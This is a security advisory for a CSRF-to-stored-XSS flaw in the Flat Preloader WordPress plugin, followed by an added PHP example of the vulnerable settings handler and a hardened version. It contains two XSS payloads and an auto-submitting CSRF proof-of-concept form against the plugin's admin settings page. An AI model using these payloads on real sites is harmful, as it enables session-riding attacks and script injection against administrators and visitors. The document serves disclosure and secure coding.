Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting

WPEX-ID: 972ECDE8-3D44-4DD9-81E3-643D8737434F
Published: Sep 28, 2021
Author: apple502j

CVSS3: 5.4 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

The plugin does not enforce nonce checks when saving its settings, nor does it sanitise and escape them, which could allow attackers to make a logged-in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload). The CSRF was fixed in 1.5.1; further sanitisation was done in v1.5.2 to 1.5.4.

Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>
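The advisory names three missing controls: a nonce check on the settings save, sanitisation of the stored values, and escaping on output. The following is an added example, not the Flat Preloader plugin's own code, of a WordPress settings handler in the shape the advisory describes and then hardened with the standard WordPress APIs (check_admin_referer, wp_nonce_field, current_user_can, sanitize_text_field, esc_url_raw, esc_attr). The option name `example_preloader`, the function names and the nonce action are assumptions; the field names come from the PoC form above.

```php
<?php
/**
 * Added example (not the plugin's own code): a WordPress settings-page save
 * handler, first in the shape the advisory describes and then hardened.
 * Option name, function names and nonce action are assumptions.
 */

// ---- Shape described by the advisory (illustrative only) ----
function example_preloader_save_vulnerable() {
    if ( isset( $_POST['save-option'] ) ) {
        // No nonce or capability check: a form on any other site can submit this
        // request in a logged-in admin's browser (CSRF).
        // No sanitisation: the submitted strings are stored exactly as sent.
        update_option( 'example_preloader', $_POST['preloader'] );
    }
}

function example_preloader_render_vulnerable() {
    $opts = get_option( 'example_preloader', array() );
    // Unescaped value inside an attribute: a stored string beginning with `"`
    // closes the attribute and the remainder is parsed as new attributes
    // (the stored XSS the advisory's payloads rely on).
    echo '<img class="preloader" src="..." alt="' . $opts['alt'] . '">';
}

// ---- Hardened version ----
function example_preloader_save_hardened() {
    if ( ! isset( $_POST['save-option'] ) ) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. Nonce check: the request must carry a token tied to this user and this
    //    action; a cross-site form cannot obtain one. Dies on failure.
    check_admin_referer( 'example_preloader_save', 'example_preloader_nonce' );

    $raw = ( isset( $_POST['preloader'] ) && is_array( $_POST['preloader'] ) )
        ? wp_unslash( $_POST['preloader'] )
        : array();

    // 3. Sanitise each field for its expected type before storing.
    $clean = array(
        'custom_image_url' => isset( $raw['custom_image_url'] ) ? esc_url_raw( $raw['custom_image_url'] ) : '',
        'text_under_icon'  => isset( $raw['text_under_icon'] ) ? sanitize_text_field( $raw['text_under_icon'] ) : '',
        'delay_time'       => isset( $raw['delay_time'] ) ? absint( $raw['delay_time'] ) : 0,
        'alt'              => isset( $raw['alt'] ) ? sanitize_text_field( $raw['alt'] ) : '',
    );
    update_option( 'example_preloader', $clean );
}
add_action( 'admin_init', 'example_preloader_save_hardened' );

function example_preloader_render_hardened() {
    $opts = get_option( 'example_preloader', array() );
    $alt  = isset( $opts['alt'] ) ? $opts['alt'] : '';
    $src  = isset( $opts['custom_image_url'] ) ? $opts['custom_image_url'] : '';
    // 4. Escape at output for the context: esc_attr() encodes `"` and `<`, so a
    //    stored `" onload=...` can no longer leave the attribute. Note that
    //    sanitize_text_field() strips tags but keeps quotes, so sanitising on
    //    save is defence in depth; the output escape is what closes the XSS.
    echo '<img class="preloader" src="' . esc_url( $src ) . '" alt="' . esc_attr( $alt ) . '">';
}

// Settings form: emits the nonce field that check_admin_referer() validates.
function example_preloader_form() {
    $opts = get_option( 'example_preloader', array() );
    $alt  = isset( $opts['alt'] ) ? $opts['alt'] : '';
    echo '<form method="post">';
    wp_nonce_field( 'example_preloader_save', 'example_preloader_nonce' );
    echo '<input type="text" name="preloader[alt]" value="' . esc_attr( $alt ) . '">';
    echo '<input type="submit" name="save-option" value="Save Changes">';
    echo '</form>';
}
```

The order of the checks matters for detection as well as prevention: check_admin_referer() dies before any state changes, so a CSRF attempt against the hardened handler surfaces as a "link has expired" failure in the admin's browser rather than as a silently altered option.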
